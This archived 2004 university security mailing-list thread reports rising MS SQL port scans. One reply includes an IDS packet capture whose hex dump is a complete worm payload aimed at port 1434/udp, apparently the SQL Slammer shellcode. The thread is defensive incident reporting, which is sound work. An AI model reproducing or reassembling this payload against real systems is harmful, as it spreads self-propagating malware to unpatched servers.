[unisog] 1433 scan increase

Nick Lewis lewisnic at internet2.edu
Fri Dec 31 21:41:56 GMT 2004


----- Original Message ----- 
From: "Jeff Kell" <jeff-kell at utc.edu>
To: "UNIversity Security Operations Group" <unisog at lists.sans.org>
Sent: Friday, December 31, 2004 2:51 PM
Subject: Re: [unisog] 1433 scan increase


> John K Lerchey wrote:
>> Yes, we're seeing them at CMU. No reports of compromised machines 
>> yet though.
>
>> On Wed, 29 Dec 2004 zero at zero.byzero.net wrote:
>>> Anyone seeing an increase in port 1433 (MS SQLServer) scans over 
>>> the last 24 hours?  It seems to have slowed down over the last 18 
>>> hours or so but continues.  I'm seeing this from many IP addresses 
>>> mostly in Asia.
>
> Increase here in 1434/udp, haven't seen that in some time.  Recent 
> ones that are particularly unusual are from source port 0 to dest 
> port 1434. I'm seeing a slow scan right now from 222.149.235.237.

I'm seeing the same host going back to 12/29 on our network.

12/31-15:33:20.219746 222.149.235.237:0 -> 207.75.164.234:1434
UDP TTL:104 TOS:0x0 ID:60922 IpLen:20 DgmLen:404
Len: 376
04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE  ....B.........p.
42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9  B.p.B........h..
B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01  .B.....1...P..5.
01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33  ...P..Qh.dllhel3
32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B  2hkernQhounthick
43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64  ChGetTf.llQh32.d
68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66  hws2_f.etQhsockf
B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45  .toQhsend....B.E
D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50  .P..P.E.P.E.P..P
BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05  ....B....=U..Qt.
BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1  ....B....1.QQP..
03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B  ..........Q.E.P.
45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45  E.P..j.j.j...P.E
C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61  .P.E.P........<a
D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2  ...E...@........
C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D  ...).......E.j..
45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50  E.P1.Qf..x.Q.E.P
8B 45 AC 50 FF D6 EB CA                          .E.P....

Nick.

Nick Lewis
System Administrator
Internet2
lewisnic at internet2.edu